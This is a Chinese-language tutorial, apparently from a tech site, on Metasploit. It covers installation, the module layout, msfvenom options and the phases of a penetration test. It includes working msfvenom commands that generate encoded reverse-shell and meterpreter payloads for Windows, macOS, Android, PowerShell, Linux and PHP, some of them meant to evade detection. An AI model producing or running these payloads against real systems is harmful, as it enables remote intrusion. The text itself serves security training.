| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> Metasploit -> 正文阅读 |
|
[系统运维]Metasploit |
Metasploitmetasploit下载ubuntu安装msfubuntu下载安装成功,在终端输入
然后赋755权限 并执行安装
Kali开启msfKali下载Kali下载地址 Kali添加root用户打开msf可以直接软件上打开,也可以在命令终端上输入msfconsole即可使用 Kali更新msf
输入apt-get update Viper炫彩蛇viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化 Kali安装viper
Metasploit目录结构
Metasploit模块/usr/share/metasploit-framework/modules auxiliary辅助模块,辅助渗透,端口扫描,登录密码爆破,漏洞验证 exploits漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用 payloads攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 post后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送一些 encoders编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过滤系统 evasion躲避模块,用来生成免杀payload nops这里主要是放着调整shellcode前置nop指令长度的工具 msfvenom常用参数-l列出指定模块的所有可用资源,模块类型包括:payloads,encoders,nops,all -p指定需要使用的payload -f指定输出格式 Transform formats:base32、base64、bash、c、csharp、dw、dword、hex、java、js_be、js_le、num、perl、pl、powershell、ps1、py、python、raw、rb、ruby、sh、vbapplication、vbscript; -e指定需要使用的encoder(编码器)编码免杀。 -a指定payload的目标架构 选择架构平台:x86 | x64 | x86_64 -o保存payload文件输出。 -b设定规避字符集,比如: '\x00\xff’避免使用的字符 -n为payload预先指定一个NOP滑动长度 -s设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。 -i指定payload的编码次数 -c指定一个附加的win32 shellcode文件 -x指定一个自定义的可执行文件作为模板 -k保护模板程序的动作,注入的payload作为一个新的进程运行 -v指定一个自定义的变量,以确定输出格式 各平台生成payload命令Windowsmsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.33 LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 10 -f exe -o payload.exe Macmsfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.33 LPORT=4444 -f macho -o payload.macho Androidmsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -o payload.apk Powershellmsfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1 Linuxmsfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f elf -o payload.elf phpmsfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f raw > shell.php msfconsole漏洞利用流程阶段划分: 前期交互阶段与客户组织进行交互讨论,确定范围,目标等 ?这个阶段大家可以理解为情报收集前阶段,主要是为了找到目标 确认范围 情报搜集阶段获取更多目标组织信息,
威胁建模阶段理清头绪,确定出最可行的漏洞利用通道,这个建模阶段写的文档不是给自己看的 是给整个团队看的 方便多人合作 这个阶段主要是根据收集到的情报进行整理 ,理清漏洞利用思路。 漏洞分析阶段搜索可获取的渗透代码资源 渗透利用阶段找出安全漏洞,入侵系统 这个阶段尝试利用漏洞 ,配置监控,开始漏洞利用 后渗透利用阶段Meterpreter,实施操作 报告阶段漏洞利用渗透测试报告 这个阶段主要是对本次渗透进行总结,概述总体上包括 时间、人员、漏洞利用范围、技术手段等等。我们需要在这部分确定漏洞利用执行的时间范围、参与漏洞利用的人员及联系方式、约定的漏洞利用范围和一些漏洞利用过程中采用的技术、工具描述。写清 前期交互 情报搜集 威胁建模 漏洞分析 .渗透利用 后渗透利用 漏洞利用结果 安全建议 等内容 在撰写的过程中,需要特别注意的是:漏洞描述切忌不可过于简单,一笔带过;在安全建议部分避免提出没有实际意义的安全建议,比如加强安全意识;报告结构混乱不堪,太多复杂的专业术语,比如绕狗、x站等等; |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/15 23:44:01- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |